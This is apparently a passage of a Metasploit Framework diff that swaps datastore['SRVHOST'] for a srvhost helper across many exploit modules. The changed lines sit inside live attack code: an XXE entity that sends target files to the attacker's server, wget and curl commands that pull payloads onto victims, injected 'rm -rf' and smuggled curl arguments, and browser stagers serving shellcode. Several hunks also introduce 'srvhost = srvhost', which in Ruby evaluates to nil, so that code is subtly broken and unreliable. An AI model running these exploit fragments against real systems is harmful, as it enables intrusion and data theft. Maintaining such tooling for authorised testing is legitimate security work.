+++ b/modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb
@@ -215,7 +215,7 @@ class MetasploitModule < Msf::Exploit::Remote
     xml += "<!DOCTYPE #{Rex::Text.rand_text_alpha_lower(4..8)}"
     xml += '['
     xml += "  <!ELEMENT #{Rex::Text.rand_text_alpha_lower(4..8)} ANY >"
-    xml += "    <!ENTITY % #{system_entity} SYSTEM \"http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{@url_file}/#{@filter_path}\"> %#{system_entity}; %#{@xxe_param};  "
+    xml += "    <!ENTITY % #{system_entity} SYSTEM \"http://#{srvhost}:#{datastore['SRVPORT']}/#{@url_file}/#{@filter_path}\"> %#{system_entity}; %#{@xxe_param};  "
     xml += ']'
     xml += "> <r>&#{@xxe_exfil};</r>"
 
@@ -606,7 +606,7 @@ class MetasploitModule < Msf::Exploit::Remote
       data = Rex::Text.rand_text_alpha_lower(4..8)
       response = "
 <!ENTITY % #{data} SYSTEM \"#{path}\">
-<!ENTITY % #{@xxe_param} \"<!ENTITY #{@xxe_exfil} SYSTEM 'http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{@url_data}/%#{data};'>\">"
+<!ENTITY % #{@xxe_param} \"<!ENTITY #{@xxe_exfil} SYSTEM 'http://#{srvhost}:#{datastore['SRVPORT']}/#{@url_data}/%#{data};'>\">"
       send_response(cli, response)
     when @url_data
       @file_data = Rex::Text.decode_base64(Rex::Text.decode_base64(req.uri.sub(%r{^/#{@url_data}/}, '')))

--- a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb
+++ b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb
@@ -163,10 +163,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # we use SRVHOST as download IP for the coming wget command.
       # SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == '::')
+      if (srvhost == '0.0.0.0' or srvhost == '::')
         srv_host = Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb
+++ b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb
@@ -276,10 +276,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # we use SRVHOST as download IP for the coming wget command.
       # SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == '::')
+      if (srvhost == '0.0.0.0' or srvhost == '::')
         srv_host = Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/linux/http/railo_cfml_rfi.rb
+++ b/modules/exploits/linux/http/railo_cfml_rfi.rb
@@ -164,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_stager(cli, _request)
-    url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + '/' + @shell_name
+    url = 'http://' + srvhost + ':' + datastore['SRVPORT'].to_s + '/' + @shell_name
 
     stager = "<cfhttp method='get' url='#{url}'"
     stager << " path='#GetDirectoryFromPath(GetCurrentTemplatePath())#..\\..\\..\\..\\..\\..\\'"

--- a/modules/exploits/linux/http/symmetricom_syncserver_rce.rb
+++ b/modules/exploits/linux/http/symmetricom_syncserver_rce.rb
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit
   end
 
   def exploit
-    srvhost = datastore['SRVHOST']
+    srvhost = srvhost
     srvport = datastore['SRVPORT']
     filename = datastore['FILENAME']
     resource_uri = '/' + filename

--- a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
+++ b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
@@ -178,7 +178,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Cleaning env')
     inject_request(cookie, token, 'rm -rf /a')
     inject_request(cookie, token, 'rm -rf b')
-    command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//)
+    command = "#{srvhost}:#{datastore['SRVPORT']}".split(//)
     command_space = 22 - "echo -n ''>>/a".length
     command_space -= 1
     command.each_slice(command_space) do |a|

--- a/modules/exploits/linux/http/vmware_vrli_rce.rb
+++ b/modules/exploits/linux/http/vmware_vrli_rce.rb
@@ -247,7 +247,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     # This is an important check...
-    fail_with(Failure::BadConfig, 'SRVHOST can\'t be localhost') if datastore['SRVHOST'] =~ /(127|0)\.0\.0\.(0|1)|localhost/
+    fail_with(Failure::BadConfig, 'SRVHOST can\'t be localhost') if srvhost =~ /(127|0)\.0\.0\.(0|1)|localhost/
 
     # Step 1 generate malicious TAR archive
     file_name = Rex::Text.rand_text_alpha(7)
@@ -283,7 +283,7 @@ class MetasploitModule < Msf::Exploit::Remote
     thrift_client.call('getNodeType', Rex::Proto::Thrift::ThriftData.stop)
 
     # Step 3 download the malicious pak
-    server_url = "http://#{Rex::Socket.to_authority(datastore['SRVHOST'], datastore['SRVPORT'])}/#{file_name}.tar"
+    server_url = "http://#{Rex::Socket.to_authority(srvhost, datastore['SRVPORT'])}/#{file_name}.tar"
     print_status 'Sending RemotePakDownloadCommand...'
     thrift_client.call(
       'runCommand',

--- a/modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
+++ b/modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def discover
     server_sock = Rex::Socket::Udp.create(
-      'LocalHost' => datastore['SRVHOST'],
+      'LocalHost' => srvhost,
       'LocalPort' => datastore['SRVPORT'],
       'Context' => {
         'Msf' => framework,

--- a/modules/exploits/linux/misc/jenkins_ldap_deserialize.rb
+++ b/modules/exploits/linux/misc/jenkins_ldap_deserialize.rb
@@ -186,7 +186,7 @@ class MetasploitModule < Msf::Exploit::Remote
     uuid = SecureRandom.uuid
 
     ldap_port = datastore["SRVPORT"]
-    ldap_host = datastore["SRVHOST"]
+    ldap_host = srvhost
     ldap_external_host = datastore["LDAPHOST"]
 
     command = payload.encoded

--- a/modules/exploits/linux/misc/opennms_java_serialize.rb
+++ b/modules/exploits/linux/misc/opennms_java_serialize.rb
@@ -84,10 +84,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def wget_payload
     resource_uri = '/' + @dropped_elf
 
-    if datastore['SRVHOST'] == "0.0.0.0" || datastore['SRVHOST'] == "::"
+    if srvhost == "0.0.0.0" || srvhost == "::"
       srv_host = Rex::Socket.source_address(rhost)
     else
-      srv_host = datastore['SRVHOST']
+      srv_host = srvhost
     end
 
     service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
+++ b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
@@ -119,10 +119,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # we use SRVHOST as download IP for the coming wget command.
       # SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      if (srvhost == "0.0.0.0" or srvhost == "::")
         srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb
+++ b/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb
@@ -201,7 +201,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     cf_url = Rex::Text.rand_text_alpha_lower(4)
 
-    srvhost = datastore['SRVHOST']
+    srvhost = srvhost
 
     # Create a URL pointing back to our HTTP server.
     cfc_payload = "<cfset #{cf_url} = createObject('java','java.net.URL').init('http://#{srvhost}:#{datastore['SRVPORT']}')/>"

--- a/modules/exploits/multi/http/bassmaster_js_injection.rb
+++ b/modules/exploits/multi/http/bassmaster_js_injection.rb
@@ -142,10 +142,10 @@ class MetasploitModule < Msf::Exploit::Remote
     @elf_sent = false
     downfile = rand_text_alpha(8 + rand(8))
     resource_uri = "\\x2f#{downfile}"
-    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+    if (srvhost == "0.0.0.0" or srvhost == "::")
       srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
     else
-      srv_host = datastore['SRVHOST']
+      srv_host = srvhost
     end
 
     @service_url = "http:\\x2f\\x2f#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"

--- a/modules/exploits/multi/http/cacti_graph_template_rce.rb
+++ b/modules/exploits/multi/http/cacti_graph_template_rce.rb
@@ -280,7 +280,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def validate_configuration!
-    if Rex::Socket.is_ipv6?(datastore['SRVHOST'])
+    if Rex::Socket.is_ipv6?(srvhost)
       fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to an IPv4 address, as an IPv6 address exceeds the 47 character payload length limitation of this exploit.')
     end
   end
@@ -305,7 +305,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Payload execution command: #{execute_payload_command}")
 
     # upload_payload_command must not exceed 47 characters or the exploit will fail, this is why 1 character payload names are used, SSL is disabled and IPv6 addresses for SRVHOST are not supported
-    upload_payload_command = "curl\\x20#{datastore['SRVHOST']}\\x3a#{datastore['SRVPORT']}/#{hosted_payload_name}\\x20-o\\x20#{on_disk_payload_name}"
+    upload_payload_command = "curl\\x20#{srvhost}\\x3a#{datastore['SRVPORT']}/#{hosted_payload_name}\\x20-o\\x20#{on_disk_payload_name}"
     fail_with(Exploit::Failure::BadConfig, "The generated upload command length of: #{upload_payload_command.length}, exceeds the 47 character limit, please attempt to shorten either SRVHOST or SRVPORT") if upload_payload_command.length > 47
     upload_stage(upload_payload_command)
     execute_stage(execute_payload_command)

--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@@ -160,7 +160,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # UPLOAD
     #
     resource_uri = '/' + app_base + '.war'
-    service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+    service_url = 'http://' + srvhost + ':' + datastore['SRVPORT'].to_s + resource_uri
     print_status("Starting up our web service on #{service_url} ...")
     start_service({
       'Uri' => {

--- a/modules/exploits/multi/http/log4shell_header_injection.rb
+++ b/modules/exploits/multi/http/log4shell_header_injection.rb
@@ -112,7 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def resource_url_string
-    "http#{datastore['SSL'] ? 's' : ''}://#{datastore['SRVHOST']}:#{datastore['HTTP_SRVPORT']}#{resource_uri}"
+    "http#{datastore['SSL'] ? 's' : ''}://#{srvhost}:#{datastore['HTTP_SRVPORT']}#{resource_uri}"
   end
 
   #

--- a/modules/exploits/multi/http/monsta_ftp_downloadfile_rce.rb
+++ b/modules/exploits/multi/http/monsta_ftp_downloadfile_rce.rb
@@ -212,7 +212,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => "request=#{Rex::Text.uri_encode({
         'connectionType' => 'ftp',
         'configuration' => {
-          'host' => datastore['SRVHOST'],
+          'host' => srvhost,
           'username' => exploit_data[:user],
           'initialDirectory' => '/',
           'password' => exploit_data[:pass],
@@ -236,7 +236,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
 
     start_ftp_service(exploit_data)
-    vprint_status("FTP server started on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
+    vprint_status("FTP server started on #{srvhost}:#{datastore['SRVPORT']}")
 
     payload_name = trigger_http_request(exploit_data)
     fail_with(Failure::Unknown, 'Failed to download payload file') unless payload_name

--- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
+++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
@@ -86,10 +86,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def lookup_lhost
     # Get the source address
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       Rex::Socket.source_address('50.50.50.50')
     else
-      datastore['SRVHOST']
+      srvhost
     end
   end
 

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @session_created = false
 
     # Step 1 : Start HTTP server for XSL file serving
-    print_status("Starting HTTP server on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
+    print_status("Starting HTTP server on #{srvhost}:#{datastore['SRVPORT']}")
     start_service(
       'Uri' => {
         'Proc' => proc { |cli, request| on_request_uri(cli, request) },
@@ -267,7 +267,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def create_smuggle_payload
-    srvhost = datastore['SRVHOST']
+    srvhost = srvhost
     srvport = datastore['SRVPORT']
 
     srvhost = Rex::Socket.source_address(rhost) if srvhost == '0.0.0.0'

--- a/modules/exploits/multi/http/rails_dynamic_render_code_exec.rb
+++ b/modules/exploits/multi/http/rails_dynamic_render_code_exec.rb
@@ -161,10 +161,10 @@ class MetasploitModule < Msf::Exploit::Remote
     @elf_sent = false
     downfile = rand_text_alpha(8 + rand(8))
     resource_uri = '/' + downfile
-    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+    if (srvhost == "0.0.0.0" or srvhost == "::")
       srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
     else
-      srv_host = datastore['SRVHOST']
+      srv_host = srvhost
     end
 
     @service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -178,12 +178,12 @@ class MetasploitModule < Msf::Exploit::Remote
     return nil unless target['VersionStart'] == '12.8' && session_ctx[:platform] == :windows
 
     # NOTE: It has to be TCP port 445 for SMB, so we don't expose this port number to the user as an option.
-    print_status("Serving a malicious extension over an SMB share on #{datastore['SRVHOST']} (SMB on TCP port 445)")
+    print_status("Serving a malicious extension over an SMB share on #{srvhost} (SMB on TCP port 445)")
 
     smb_service = SimpleSMBShareWrapper.new
 
     smb_service.datastore['SRVPORT'] = 445
-    smb_service.datastore['SRVHOST'] = datastore['SRVHOST']
+    smb_service.datastore['SRVHOST'] = srvhost
 
     smb_service.setup
 
@@ -193,7 +193,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     smb_service.start_service({
       'ServerPort' => 445,
-      'ServerHost' => datastore['SRVHOST']
+      'ServerHost' => srvhost
     })
 
     smb_service

--- a/modules/exploits/multi/http/struts_code_exec.rb
+++ b/modules/exploits/multi/http/struts_code_exec.rb
@@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def windows_stager
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
 

--- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
+++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
@@ -110,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rand_text_alphanumeric(rand(4..7))
 
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
 

--- a/modules/exploits/multi/http/struts_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_default_action_mapper.rb
@@ -119,10 +119,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def start_http_service
-    if (datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == '::')
+    if (srvhost == '0.0.0.0' or srvhost == '::')
       srv_host = Rex::Socket.source_address(rhost)
     else
-      srv_host = datastore['SRVHOST']
+      srv_host = srvhost
     end
 
     service_url = srv_host + ':' + datastore['SRVPORT'].to_s

--- a/modules/exploits/multi/http/totaljs_cms_widget_exec.rb
+++ b/modules/exploits/multi/http/totaljs_cms_widget_exec.rb
@@ -157,7 +157,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def create_widget(admin_token)
     platform = target.platform.names.first
-    host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket::source_address : datastore['SRVHOST']
+    host = srvhost == '0.0.0.0' ? Rex::Socket::source_address : srvhost
     port = datastore['SRVPORT']
     proto = datastore['SSL'] ? 'https' : 'http'
     payload_name = "p_#{Rex::Text.rand_text_alpha(5)}"

--- a/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb
+++ b/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb
@@ -157,10 +157,10 @@ class MetasploitModule < Msf::Exploit::Remote
     downfile = rand_text_alpha(8 + rand(8))
     resource_uri = '/' + downfile
 
-    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+    if (srvhost == "0.0.0.0" or srvhost == "::")
       srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
     else
-      srv_host = datastore['SRVHOST']
+      srv_host = srvhost
     end
 
     @service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/multi/http/wondercms_rce.rb
+++ b/modules/exploits/multi/http/wondercms_rce.rb
@@ -144,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi!({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, "/?installModule=http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{@zip_filename}&directoryName=#{Rex::Text.rand_text_alphanumeric(1..8)}&type=themes&token=#{@token}")
+      'uri' => normalize_uri(target_uri.path, "/?installModule=http://#{srvhost}:#{datastore['SRVPORT']}/#{@zip_filename}&directoryName=#{Rex::Text.rand_text_alphanumeric(1..8)}&type=themes&token=#{@token}")
     })
   end
 

--- a/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
+++ b/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
@@ -300,7 +300,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Want to just point this to the base of our install. WebLogic will append *CLASS NAME*.class to the end of
   # this URL when it tries to fetch the class to be loaded and instantiated.
   def ldap_url_string
-    "http#{datastore['SSL'] ? 's' : ''}://#{Rex::Socket.to_authority(datastore['SRVHOST'], datastore['HTTP_SRVPORT'])}/"
+    "http#{datastore['SSL'] ? 's' : ''}://#{Rex::Socket.to_authority(srvhost, datastore['HTTP_SRVPORT'])}/"
   end
 
   #

--- a/modules/exploits/multi/misc/cups_ipp_remote_code_execution.rb
+++ b/modules/exploits/multi/misc/cups_ipp_remote_code_execution.rb
@@ -189,7 +189,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super
 
     # Rex::Socket does not support forwarding UDP multicast sockets right now so raise an exception if that's configured
-    unless _determine_server_comm(datastore['SRVHOST']) == Rex::Socket::Comm::Local
+    unless _determine_server_comm(srvhost) == Rex::Socket::Comm::Local
       raise Msf::OptionValidateError.new({ 'SRVHOST' => 'SRVHOST can not be forwarded via a session.' })
     end
   end
@@ -510,7 +510,7 @@ class MetasploitModule < Msf::Exploit::Remote
       type: 'A',
       ttl: 30,
       # The IP address of our malicious HTTP IPP service
-      address: datastore['SRVHOST']
+      address: srvhost
     ))
 
     # SRV record

--- a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb
+++ b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb
@@ -221,10 +221,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # we use SRVHOST as download IP for the coming wget command.
       # SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == '::')
+      if (srvhost == '0.0.0.0' or srvhost == '::')
         srv_host = Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/osx/browser/safari_file_policy.rb
+++ b/modules/exploits/osx/browser/safari_file_policy.rb
@@ -94,10 +94,10 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   def lookup_lhost(c = nil)
     # Get the source address
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       Rex::Socket.source_address(c || '50.50.50.50')
     else
-      datastore['SRVHOST']
+      srvhost
     end
   end
 
@@ -176,7 +176,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Default the server host / port
     opts = {
-      'ServerHost' => datastore['SRVHOST'],
+      'ServerHost' => srvhost,
       'ServerPort' => datastore['HTTPPORT'],
       'Comm' => comm
     }.update(opts)

--- a/modules/exploits/unix/http/pihole_blocklist_exec.rb
+++ b/modules/exploits/unix/http/pihole_blocklist_exec.rb
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # also, looks like if you have a path (/file.php), it won't trigger either, or the / gets
     # messed with.
     data = {
-      'newuserlists' => %(http://#{datastore['SRVHOST']}#" -o #{file} -d "),
+      'newuserlists' => %(http://#{srvhost}#" -o #{file} -d "),
       'field' => 'adlists',
       'token' => token,
       'submit' => 'saveupdate'

--- a/modules/exploits/unix/http/xdebug_unauth_exec.rb
+++ b/modules/exploits/unix/http/xdebug_unauth_exec.rb
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
       begin
         server = Rex::Socket::TcpServer.create(
           'LocalPort' => datastore['SRVPORT'],
-          'LocalHost' => datastore['SRVHOST'],
+          'LocalHost' => srvhost,
           'Context' => {
             'Msf' => framework,
             'MsfExploit' => self

--- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
+++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
@@ -115,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")
+    print_status("Starting up our web service on http://#{srvhost}:#{datastore['SRVPORT']}#{resource_uri}...")
     start_service
 
     print_status("Requesting a search using our custom XSLT...")
@@ -127,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'site' => m[1],
         'output' => 'xml_no_dtd',
         'q' => rand_text_alpha(rand(15) + 1),
-        'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
+        'proxystylesheet' => "http://#{srvhost}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
         'proxyreload' => '1'
       }
     }, 25)

--- a/modules/exploits/windows/antivirus/ams_xfr.rb
+++ b/modules/exploits/windows/antivirus/ams_xfr.rb
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def windows_stager
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
 

--- a/modules/exploits/windows/browser/adobe_flash_sps.rb
+++ b/modules/exploits/windows/browser/adobe_flash_sps.rb
@@ -148,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
       js.obfuscate(memory_sensitive: true)
     end
 
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
     mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6) + 3)}.mp4"
     swf_uri = Rex::Text.rand_text_alphanumeric(rand(8) + 4) + ".swf" + "?autostart=true&image=video.jpg&file=#{mp4_uri}"
 

--- a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     uri = ((datastore['SSL']) ? "https://" : "http://")
-    uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
+    uri << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost)
     uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{code}"
 
     bd_uri = Zlib::Deflate.deflate(uri)

--- a/modules/exploits/windows/browser/aol_icq_downloadagent.rb
+++ b/modules/exploits/windows/browser/aol_icq_downloadagent.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"
 
     if (request.uri.match(/PAYLOAD/))

--- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
@@ -148,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       print_status("Sending initial HTML")
       url = ((datastore['SSL']) ? "https://" : "http://")
-      url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
+      url << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : srvhost)
       url << ":" + datastore['SRVPORT'].to_s
       url << get_resource
       fname = rand_text_alphanumeric(4)

--- a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
@@ -98,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       shellcode = Rex::Text.to_unescape(p.encoded)
       url = ((datastore['SSL']) ? "https://" : "http://")
-      url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
+      url << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : srvhost)
       url << ":" + datastore['SRVPORT'].to_s
       url << get_resource
       js = <<-ENDJS

--- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       shellcode = Rex::Text.to_unescape(p.encoded)
       url = ((datastore['SSL']) ? "https://" : "http://")
-      url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
+      url << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : srvhost)
       url << ":" + datastore['SRVPORT'].to_s
       url << get_resource
 

--- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
@@ -182,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Sending initial HTML")
 
       url = ((datastore['SSL']) ? "https://" : "http://")
-      url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
+      url << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : srvhost)
       url << ":" + datastore['SRVPORT'].to_s
       url << get_resource
 

--- a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
+++ b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
 
     if (request.uri.match(/payload/))

--- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
+++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     url = "http://"
-    url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
 
     # VBScript variables

--- a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
